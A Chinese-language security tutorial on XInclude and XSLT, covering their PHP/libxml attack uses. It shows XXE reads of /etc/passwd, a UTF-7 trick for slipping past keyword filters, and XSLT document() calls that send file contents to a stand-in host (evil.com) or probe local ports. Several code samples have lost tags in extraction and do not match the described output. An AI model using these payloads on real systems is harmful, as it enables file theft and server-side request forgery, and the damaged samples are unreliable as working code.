位置:首页 > 安全分类 > WEB安全

浅析xml之xinclude xslt

2022-05-19 17:03:58 来源:
简介前言最近依旧在研究xml及其相关安全问题,前一篇文章已经提及了较为大众且CTF中常见的xml攻击方式https://www.anquanke.com/post/id/155328
这里再提两个较为小众的攻击方式(

前言

最近依旧在研究xml及其相关安全问题,前一篇文章已经提及了较为大众且CTF中常见的xml攻击方式

https://www.anquanke.com/post/id/155328

这里再提两个较为小众的攻击方式(此处小众是指CTF比赛中不常见)

Xinclude

什么是xinclude

顾名思义,xinclude可以理解为xml include

熟悉编译/脚本语言的一定熟知,像php的include,python和java的import都是可以进行文件包含的。

那么文件包含有什么好处?

当然是可以使代码更整洁,我们可以将定义的功能函数放在function.php中,再在需要使用功能函数的文件中使用include包含function.php,这样就避免了重复冗余的函数定义,同样可以增加代码的可读性

故此,xinclude也不例外,它是xml标记语言中包含其他文件的方式

为什么使用xinclude

正如如上所说,xinclude可以使代码可读性更高,这里给出官方手册中的样例,便于理解:

page.xml

<webpage>
<body>Hello world!body>
   <xi:include href="templates/footer.xml" xmlns:xi="http://www.w3.org/2003/XInclude"/>
webpage>

footer.xml:

<footer>? Contoso Corp, 2003footer>

处理过程

xinclude的语法介绍

xinclude的语法相对来说,非常简单,只是在http://www.w3.org/2003/XInclude命名空间中的两个元素,即 include 和 fallback

常用的命名空间前缀是“xi”(但可以根据喜好自由使用任何前缀)

xi:include 元素

元素中的几个属性:

  • href — 对要包括的文档的 URI 引用。
  • parse — 它的值可以是“xml”或“text”,用于定义如何包括指定的文档(是作为 XML 还是作为纯文本)。默认值是“xml”。
  • xpointer — 这是一个 XPointer,用于标识要包括的 XML 文档部分。如果作为文本包括 (parse=”text”),将忽略该属性。

encoding — 作为文本包括时,该属性提供所包括文档的编码提示信息。

样例如下:

xi:fallback 元素

简单而言,类似于try...except...,如果xinclude的内容出现问题,则显示fallback的内容

例如

<xi:include href="test.xml" parse="text"/>
    <xi:fallback>Sorry, the file is unavailable<xi:fallback>
xi:include>

此时解析xml后,若test.xml不存在,则会解析获取到Sorry, the file is unavailable

安全问题

看完上述内容,一定会有人问,为什么不直接使用外部实体引入就好了?

这里官方文档也给出了详尽的解释:

XML 外部实体有很多众所周知的局限和不便于使用的含义,这些因素极大地妨碍了 XML 外部实体成为多用途包含工具:

  • 1.XML 外部实体无法成为一个成熟的独立 XML 文档,因为它既不允许独立的 XML 声明,也不允许 Doctype 声明。这实际上意味着 XML 外部实体本身无法包括其他外部实体。
  • 2.XML 外部实体必须是格式规范的 XML
  • 3.未能加载外部实体是重大错误 (fatal error);严格禁止任何恢复。
  • 4.只能包括整个外部实体,无法只包括文档的一部分。

5.外部实体必须在 DTD 或内部子集中进行声明。

等等,外部实体?讲到安全问题,你是否立刻就想到了XXE(XML External Entity Injection)任意文件读取的问题?

没错,xinclude作为外部实体引用的替代品,同样具有XXE的问题,并且还有一些特别的地方:

传统的XXE文件读取

$xml = <<
  
]>
&f;
EOD;
$dom = new DOMDocument;
// let's have a nice output
$dom->preserveWhiteSpace = false;
$dom->formatOutput = true;
// load the XML string defined above
$dom->loadXML($xml);
// substitute xincludes
echo $dom->saveXML();
?>

但是访问该页面,我们却发现并没有解析xml

这是因为php的xml库的底层库是libxml2,而在2.6版本之后,改库已默认禁用外部实体引用的解析,我们可以使用

echo LIBXML_DOTTED_VERSION;

来查看当前版本号

所以我当前的xml解析已默认不支持外部实体引入了,故此我们查阅php手册中的libxml option constants,可以发现使用LIBXML_NOENT选项即可加载外部实体

所以关键代码更改为

$dom->loadXML($xml,LIBXML_NOENT);

即可:

传统文件读取进阶版—过滤

倘若我们发现外部实体引入时,存在关键词过滤

例如

ENTITY

等被过滤,那么我们可以尝试使用utf-7编码

例如

  
]>
<x>&f;x>

我们利用

https://www.motobit.com/util/charset-codepage-conversion.asp

转为utf-7

+ADwAIQ-DOCTYPE ANY +AFs-
  +ADwAIQ-ENTITY f SYSTEM +ACI-file:///etc/passwd+ACIAPg-
+AF0APg-
+ADw-x+AD4AJg-f+ADsAPA-/x+AD4-

然后使用

测试脚本

$xml = <<
+ADwAIQ-DOCTYPE ANY +AFs-
    +ADwAIQ-ENTITY f SYSTEM +ACI-file:///etc/passwd+ACIAPg-
+AF0APg-
+ADw-x+AD4AJg-f+ADsAPA-/x+AD4-
EOD;
$dom = new DOMDocument;
// let's have a nice output
$dom->preserveWhiteSpace = false;
$dom->formatOutput = true;
$dom->loadXML($xml,LIBXML_NOENT);
echo $dom->saveXML();
?>

效果如下

xinclude文件读取

倘若由于需要,我们使用了xinclude

$xml = <<
 
EOD;
$dom = new DOMDocument;
// let's have a nice output
$dom->preserveWhiteSpace = false;
$dom->formatOutput = true;
$dom->loadXML($xml);
$dom->xinclude();
echo $dom->saveXML();
?>

我们发现

$dom->loadXML($xml);

我们并没有打开外部实体引用选项,却成功的读取/etc/passwd的内容

这一点值得关注,倘若我们在测试过程中,发现我们可控xml文本内容,但是引入外部实体无效或是存在过滤,尝试编码绕过也不行的时候,那么可以尝试使用xinclude

因为xinclude无需使用LIBXML_NOENT选项去开启默认关闭的外部实体引用

XSLT

XSL 指扩展样式表语言(EXtensible Stylesheet Language)

而XSLT 指 XSL 转换:即使用 XSLT 可将 XML 文档转换为其他文档,比如XHTML。

简单样例

下面展示利用php后端语言,将xml转换为html

test.xml

<root>
    <name>skyname>
    <blog>skysec.topblog>
    <country>Chinacountry>
root>

test.xsl

<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html>
<body>
<table border="1">
  <tr bgcolor="#9acd32">
    <th align="left">Nameth> 
    <th align="left">Blogth> 
    <th align="left">Countryth> 
  tr>
  <xsl:for-each select="root">
  <tr>
    <td><xsl:value-of select="name" />td>
    <td><xsl:value-of select="blog" />td>
    <td><xsl:value-of select="country" />td>
  tr>
  xsl:for-each>
table>
body>
html>
xsl:template>
xsl:stylesheet>

test.php

 
$xslDoc = new DOMDocument();
$xslDoc->load("test.xsl");
$xmlDoc = new DOMDocument();
$xmlDoc->load("test.xml");
$proc = new XSLTProcessor();
$proc->importStylesheet($xslDoc);
echo $proc->transformToXML($xmlDoc);

结果如下

查看源代码

<html><body><table border="1">
<tr bgcolor="#9acd32">
<th align="left">Nameth>
<th align="left">Blogth>
<th align="left">Countryth>
tr>
<tr>
<td>skytd>
<td>skysec.toptd>
<td>Chinatd>
tr>
table>body>html>

发现

<td><xsl:value-of select="name" />td>
<td><xsl:value-of select="blog" />td>
<td><xsl:value-of select="country" />td>

已被替换成对应的值

安全问题

传统文件读取

这里的安全问题基本与xml中相同

像读文件:

   
]>  
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/root">
  &shit;
xsl:template>
xsl:stylesheet>

这就很成功的可以读取文件内容了

但是需要注意的是,同样因为php底层的libxml库默认禁用了外部实体引入,所以我们还是需要手动加入

$xslDoc = new DOMDocument();
$xslDoc->load("test.xsl",LIBXML_NOENT);

xsl文件读取

当没开启外部实体引入的时候,我们可以考虑如下方式

  • 查阅手册,发现该元素必须是 或 的子节点
  • 语法为

既然是url,那么利用的方式就有很多种了

例如:

此时报错了

我们尝试用base64

解base64

这很不爽,因为

echo $proc->transformToXML($xmlDoc)

的原因,我们不能输出完整的信息

如果我改成

echo base64_encode($proc->transformToXML($xmlDoc));

其实是可以成功读取文件内容的,但估计目标不会先base64再帮我们打印出来吧

所以有了以下方法

  • document()
  • 我们结合该函数却可以直接带出数据
<xsl:variable name="name1" select="document('file:///etc/passwd')" />
<xsl:variable name="name2" select="concat('http://evil.com/?', $name1)" />
<xsl:variable name="name3" select="document($name2)" />

传统端口探测

话不多说,测试脚本如下

当外部实体引用开启时

$xml = <<
]>
&shit;
EOD;
$dom = new DOMDocument;
// let's have a nice output
$dom->preserveWhiteSpace = false;
$dom->formatOutput = true;
$dom->loadXML($xml,LIBXML_NOENT);
echo $dom->saveXML();
?>

当端口关闭的时候发现

当端口开启的时候

xsl端口探测

上述方法需要开启外部实体引入,而这里只需要使用document()函数即可

给出部分代码

<xsl:for-each select="sky">
  <tr>
    <td><xsl:value-of select="name" />td>
    <td><xsl:value-of select="blog" />td>
    <td><xsl:value-of select="country" />td>
    <td><xsl:value-of select="document('http://127.0.0.1:9999')" />td>
  tr>
  xsl:for-each>

当端口关闭时


当端口开启时

CTF样题

曾经有做过一道xslt服务端注入攻击的综合题目,有兴趣的可以看这篇wrietup

http://skysec.top/2018/03/23/%E4%BB%8Esql%E6%B3%A8%E5%85%A5%E5%88%B0xslt%E5%86%8D%E5%88%B0xxe%E7%9A%84%E4%B8%80%E9%81%93ctf%E9%A2%98%E7%9B%AE/#%E6%80%9D%E8%80%83%E6%94%BB%E5%87%BB%E7%82%B9


后记

Xml作为一种标记语言,其中蕴含的技巧还有许多等待探索,我在此抛砖引玉了~很期待有师傅来交流一些XD的姿势~